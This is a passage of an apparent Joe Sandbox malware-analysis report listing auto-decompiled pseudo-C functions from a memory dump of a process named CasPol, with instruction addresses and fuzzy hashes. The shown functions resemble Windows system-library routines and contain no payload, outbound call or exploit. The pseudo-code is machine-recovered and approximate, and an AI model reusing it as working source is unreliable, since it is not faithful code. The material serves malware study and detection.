				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E01647D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E01647D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E01647D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E01647D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E016A7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                0x0164ae78
                                                                0x0164ae7c
                                                                0x0164ae7e
                                                                0x0164ae81
                                                                0x0164ae86
                                                                0x0164ae8d
                                                                0x01692691
                                                                0x0164ae93
                                                                0x0164ae93
                                                                0x0164ae93
                                                                0x0164ae98
                                                                0x0164ae9d
                                                                0x016926a2
                                                                0x016926b4
                                                                0x016926a4
                                                                0x016926ad
                                                                0x016926ad
                                                                0x016926b9
                                                                0x00000000
                                                                0x016926bb
                                                                0x00000000
                                                                0x016926bb
                                                                0x0164aea3
                                                                0x0164aea3
                                                                0x0164aea3
                                                                0x0164aeaa
                                                                0x016926c0
                                                                0x016926c9
                                                                0x016926c9
                                                                0x0164aeb3
                                                                0x016926d4
                                                                0x016926e1
                                                                0x00000000
                                                                0x00000000
                                                                0x016926e7
                                                                0x016926ee
                                                                0x016926f0
                                                                0x016926f9
                                                                0x016926f9
                                                                0x01692702
                                                                0x01692708
                                                                0x01692708
                                                                0x0169270b
                                                                0x0169270f
                                                                0x01692711
                                                                0x01692711
                                                                0x01692725
                                                                0x01692725
                                                                0x00000000
                                                                0x0164aeb9
                                                                0x0164aeb9
                                                                0x0164aebf
                                                                0x0164aebf
                                                                0x0164aeb3

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                • Instruction ID: 5baa470d8b5dccef382ed55efc499289b511d4ce0c77d441f5deefe336abaf49
                                                                • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                • Instruction Fuzzy Hash: 3921D132601691AFEB26DB6CCD54B257BE9EF44640F1900A8EE058BBA2E734DC41C6E0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165FD9B Relevance: .1, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 93%
                                                                			E0165FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E016376E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                0x0165fd9b
                                                                0x0165fda0
                                                                0x0165fda1
                                                                0x0165fdab
                                                                0x0165fdad
                                                                0x0165fdb0
                                                                0x0165fdb8
                                                                0x0165fe0f
                                                                0x0165fde6
                                                                0x0165fde9
                                                                0x0165fdec
                                                                0x0169c0c0
                                                                0x0165fdfe
                                                                0x0165fe06
                                                                0x0165fe06
                                                                0x0169c0c8
                                                                0x0165fe2d
                                                                0x0165fe2d
                                                                0x00000000
                                                                0x0165fe2d
                                                                0x0169c0d1
                                                                0x0169c0e0
                                                                0x0169c0e5
                                                                0x0169c0e5
                                                                0x0169c0e8
                                                                0x00000000
                                                                0x0169c0e8
                                                                0x0165fdf4
                                                                0x00000000
                                                                0x00000000
                                                                0x0165fdf6
                                                                0x0165fdfa
                                                                0x0165fe1a
                                                                0x0165fe1f
                                                                0x0165fe1f
                                                                0x0165fdfc
                                                                0x00000000
                                                                0x0165fdfc
                                                                0x0165fdcc
                                                                0x0165fdd0
                                                                0x0165fe26
                                                                0x00000000
                                                                0x0165fe26
                                                                0x0165fdd8
                                                                0x0165fddb
                                                                0x0165fddd
                                                                0x0165fde0
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                • Instruction ID: 9bf3194a4b234d63a4cb0b9d038d45809ee19c26fc15db620a2e28a53a90e14a
                                                                • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                • Instruction Fuzzy Hash: 5F217972600A45EBD771CF0DCA40E66F7E5EB94A10F2485AEE94987B11D731AC01DB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0163841F Relevance: .1, Instructions: 64COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 80%
                                                                			E0163841F(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t43;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				signed int _t64;

				_v16 = __ecx;
				_t43 =  *0x7ffe0004;
				_v8 = _t43;
				_t57 =  *0x7ffe0014 ^  *( *[fs:0x18] + 0x24) ^  *( *[fs:0x18] + 0x20) ^  *0x7ffe0018;
				_v12 = 0x7ffe0014;
				if(_t43 < 0x1000000) {
					while(1) {
						_t46 =  *0x7ffe0324;
						_t50 =  *0x7FFE0320;
						if(_t46 ==  *0x7FFE0328) {
							break;
						}
						asm("pause");
					}
					_t57 = _v12;
					_t64 = ((_t50 * _v8 >> 0x00000020 << 0x00000020 | _t50 * _v8) >> 0x18) + (_t46 << 8) * _v8;
				} else {
					_t64 = ( *0x7ffe0320 * _t43 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t43) >> 0x18;
				}
				_push(0);
				_push( &_v24);
				E01669810();
				return _t64 ^ _v20 ^ _v24 ^ _t57 ^ _v16;
			}













                                                                0x0163842f
                                                                0x01638448
                                                                0x0163844e
                                                                0x01638459
                                                                0x0163845b
                                                                0x01638464
                                                                0x01689ac3
                                                                0x01689ac3
                                                                0x01689ac5
                                                                0x01689acb
                                                                0x00000000
                                                                0x00000000
                                                                0x01689acd
                                                                0x01689acd
                                                                0x01689ad1
                                                                0x01689ae9
                                                                0x0163846a
                                                                0x01638475
                                                                0x01638479
                                                                0x0163847c
                                                                0x01638481
                                                                0x01638482
                                                                0x0163849a

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                                                • Instruction ID: 9dcd770ecac9a9ec1d39332f63975639fc67cf47642c98b03b2879ff84cc7076
                                                                • Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                                                • Instruction Fuzzy Hash: 12219076E00119CBCB14CFA9C98069AF3F9FB88350F664565ED18B7340C630AE05CBD0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165B390 Relevance: .1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 54%
                                                                			E0165B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01642280(_t12, 0x1718608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E016600C2(0x1718608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                0x0165b395
                                                                0x0165b3a2
                                                                0x0165b3a5
                                                                0x0165b3aa
                                                                0x0165b3b2
                                                                0x0165b3ba
                                                                0x0165b3bd
                                                                0x0165b3c0
                                                                0x0165b3c4
                                                                0x0165b3c9
                                                                0x0169a3e9
                                                                0x0169a3ed
                                                                0x0169a3f0
                                                                0x0169a3ff
                                                                0x0169a403
                                                                0x0169a409
                                                                0x00000000
                                                                0x00000000
                                                                0x0169a40b
                                                                0x0169a40b
                                                                0x0169a40f
                                                                0x0169a415
                                                                0x0169a423
                                                                0x0169a423
                                                                0x0169a415
                                                                0x0165b3d1
                                                                0x0165b3e8
                                                                0x0165b3e8
                                                                0x0165b3d9

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2df282e53eda6adf630ec4de61dfd4526240a4aee38fa579714c1dc1cdbbb554
                                                                • Instruction ID: 6e39cf737a80058f1e54a8741f40a2a1a2297341011b54e50f95fd5a0b7c1026
                                                                • Opcode Fuzzy Hash: 2df282e53eda6adf630ec4de61dfd4526240a4aee38fa579714c1dc1cdbbb554
                                                                • Instruction Fuzzy Hash: 3B1166333051209FCB29CA589D81A2BB29BEBC5770F38413DEE26D7381CA31AC02C695
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01629240 Relevance: .1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 77%
                                                                			E01629240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x16ff708);
				E0167D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E016695D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E016695D0();
				_t33 =  *0x17184c4; // 0x0
				L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x17184c4; // 0x0
				L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x17184c4; // 0x0
				E01642280(L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x17186b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E016695D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E016695D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01629325();
					_t50 =  *0x17184c4; // 0x0
					return E0167D0D1(L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                0x01629240
                                                                0x01629242
                                                                0x01629247
                                                                0x0162924c
                                                                0x0162924e
                                                                0x01629255
                                                                0x01629257
                                                                0x0162925a
                                                                0x0162925f
                                                                0x0162925f
                                                                0x01629266
                                                                0x01629271
                                                                0x01629276
                                                                0x01629279
                                                                0x0162927e
                                                                0x01629295
                                                                0x0162929a
                                                                0x016292b1
                                                                0x016292b6
                                                                0x016292d7
                                                                0x016292dc
                                                                0x016292e0
                                                                0x016292e6
                                                                0x016292e8
                                                                0x016292ee
                                                                0x01629332
                                                                0x01629333
                                                                0x01629337
                                                                0x01629338
                                                                0x0162933a
                                                                0x0162933a
                                                                0x0162933d
                                                                0x01629342
                                                                0x01629342
                                                                0x01629345
                                                                0x01629349
                                                                0x0162934e
                                                                0x01629352
                                                                0x01629357
                                                                0x016292f4
                                                                0x016292f4
                                                                0x016292f6
                                                                0x016292f9
                                                                0x01629300
                                                                0x01629306
                                                                0x01629324
                                                                0x01629324

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 76a3671a6aa4d3a2777028174f5dd635f1d0961dcc2318dbd73e7d6607306ed2
                                                                • Instruction ID: 6270b9850aecfa586cdad718f01601a539740ba811019901f6caea484f3d1e58
                                                                • Opcode Fuzzy Hash: 76a3671a6aa4d3a2777028174f5dd635f1d0961dcc2318dbd73e7d6607306ed2
                                                                • Instruction Fuzzy Hash: D3213972151A11DFC722EF68CE40F5AB7BABF18718F14496CE149866A2CB34E941CF88
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016B4257 Relevance: .1, Instructions: 60COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 90%
                                                                			E016B4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x17008d0);
				E0167D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E016B41E8(__ebx, __edi, __ecx, _t39);
				E0163EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x17187e4;
					_t18 =  *0x17187e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1715cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x17187e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x17187e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L01627055(_t31 + 0xfffffff8);
								_t24 =  *0x17187e0; // 0x0
								_t18 = _t24 - 1;
								 *0x17187e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1715cd0;
				if( *0x1715cd0 <= 0) {
					L01627055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x17187e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x17187e8 = _t30;
						 *0x17187e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0167D0D1(L016B4320());
			}















                                                                0x016b4257
                                                                0x016b4257
                                                                0x016b4257
                                                                0x016b4259
                                                                0x016b425e
                                                                0x016b4263
                                                                0x016b4265
                                                                0x016b4273
                                                                0x016b4278
                                                                0x016b427c
                                                                0x016b427f
                                                                0x016b4281
                                                                0x016b4287
                                                                0x016b42d7
                                                                0x016b42d7
                                                                0x016b42da
                                                                0x016b428d
                                                                0x016b428d
                                                                0x016b428f
                                                                0x016b4292
                                                                0x016b4297
                                                                0x016b429c
                                                                0x016b42a0
                                                                0x016b42a6
                                                                0x016b42a8
                                                                0x016b42ae
                                                                0x016b42b3
                                                                0x00000000
                                                                0x016b42ba
                                                                0x016b42ba
                                                                0x016b42bf
                                                                0x016b42c5
                                                                0x016b42ca
                                                                0x016b42cf
                                                                0x016b42d0
                                                                0x00000000
                                                                0x016b42d0
                                                                0x016b42b3
                                                                0x00000000
                                                                0x016b42a6
                                                                0x016b429c
                                                                0x016b42dc
                                                                0x016b42dc
                                                                0x016b42e3
                                                                0x016b4309
                                                                0x016b42e5
                                                                0x016b42e5
                                                                0x016b42e8
                                                                0x016b42ee
                                                                0x016b42f0
                                                                0x00000000
                                                                0x016b42f2
                                                                0x016b42f2
                                                                0x016b42f4
                                                                0x016b42f7
                                                                0x016b42f9
                                                                0x016b4300
                                                                0x016b4300
                                                                0x016b42f0
                                                                0x016b430e
                                                                0x016b431f

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2fbd78c8ed5d21a5a6a3323ec73d3232ac2f17e58c3816b036e0550d44e6e91f
                                                                • Instruction ID: e8108ed256d05ae470838be4ee146178fd001fd1f636b4bd906fbdbd66aa0892
                                                                • Opcode Fuzzy Hash: 2fbd78c8ed5d21a5a6a3323ec73d3232ac2f17e58c3816b036e0550d44e6e91f
                                                                • Instruction Fuzzy Hash: E5219D70941602CFC726DFACD880A94BBF1FF85364B14C26EC1569B39ADB31C492CB45
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01652397 Relevance: .1, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 34%
                                                                			E01652397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x171848c != 0) {
					L0164FAD0(0x1718610);
					if( *0x171848c == 0) {
						E0164FA00(0x1718610, _t19, _t27, 0x1718610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01652581(0x1718610, 0x16050a0, _t26, _t27, _t28);
						E0164FA00(0x1718610, 0x16050a0, _t27, 0x1718610);
					}
				} else {
					L1:
					_t11 =  *0x1718614; // 0x0
					if(_t11 == 0) {
						_t11 = E01664886(0x1601088, 1, 0x1718614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01652581(0x1718610, (_t11 << 4) + 0x1605070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                0x016523b0
                                                                0x016523b6
                                                                0x01652409
                                                                0x01652415
                                                                0x01695ae9
                                                                0x00000000
                                                                0x0165241b
                                                                0x0165241b
                                                                0x0165241d
                                                                0x01652427
                                                                0x0165242e
                                                                0x01652430
                                                                0x01652430
                                                                0x016523b8
                                                                0x016523b8
                                                                0x016523b8
                                                                0x016523bf
                                                                0x016523fc
                                                                0x016523fc
                                                                0x016523c1
                                                                0x016523c3
                                                                0x016523d0
                                                                0x016523d8
                                                                0x016523d8
                                                                0x016523dc
                                                                0x016523de
                                                                0x016523e1
                                                                0x016523e1
                                                                0x016523ec

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5ee4412a7242a72ee14fadff313c455659615fc81540ced15315a99075306195
                                                                • Instruction ID: 85554dc298efbfb6d7f2d6238d74747c367693261ddeeade22ce2a027b3120f9
                                                                • Opcode Fuzzy Hash: 5ee4412a7242a72ee14fadff313c455659615fc81540ced15315a99075306195
                                                                • Instruction Fuzzy Hash: 0F112B31744301EBE7759A2DEC90B16B79EBBA0720F14842EFE0397282CAB0D841C759
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016A46A7 Relevance: .1, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 93%
                                                                			E016A46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L01644620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0166F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0165D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L016477F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                0x016a46b7
                                                                0x016a46ba
                                                                0x016a46c5
                                                                0x016a46c8
                                                                0x016a46d0
                                                                0x016a46d4
                                                                0x016a46e6
                                                                0x016a46e9
                                                                0x016a46f4
                                                                0x016a46ff
                                                                0x016a4705
                                                                0x016a4706
                                                                0x016a470c
                                                                0x016a4713
                                                                0x016a471b
                                                                0x016a4723
                                                                0x016a4725
                                                                0x016a46d6
                                                                0x016a46d9
                                                                0x016a46db
                                                                0x016a46db
                                                                0x016a4732

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                • Instruction ID: 2df4613deda7c91145dafb9996a29ca7ba692a0d9ea299496493a51dbfdea224
                                                                • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                • Instruction Fuzzy Hash: 6A11C272504208BBC7059F5C9C809BEBBBAEF95310F1080AEF94487351DE318D55D7A9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0162C962 Relevance: .1, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 42%
                                                                			E0162C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x171d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0163EEF0(0x17170a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E016AF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0163EB70(_t29, 0x17170a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0166B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E016AF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x17170c0; // 0x0
					while(_t38 != 0x17170c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x171b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                0x0162c96a
                                                                0x0162c974
                                                                0x0162c988
                                                                0x0162c98a
                                                                0x01697c9d
                                                                0x01697c9f
                                                                0x01697ca4
                                                                0x01697cae
                                                                0x01697cf0
                                                                0x01697cf5
                                                                0x01697cfa
                                                                0x0162c992
                                                                0x0162c996
                                                                0x0162c997
                                                                0x0162c998
                                                                0x0162c9a3
                                                                0x0162c9a3
                                                                0x01697cb0
                                                                0x01697cb7
                                                                0x01697cbb
                                                                0x00000000
                                                                0x00000000
                                                                0x01697cbd
                                                                0x01697ce8
                                                                0x01697cc5
                                                                0x01697cc8
                                                                0x01697cca
                                                                0x01697cd0
                                                                0x01697cd6
                                                                0x01697cde
                                                                0x01697ce4
                                                                0x01697ce4
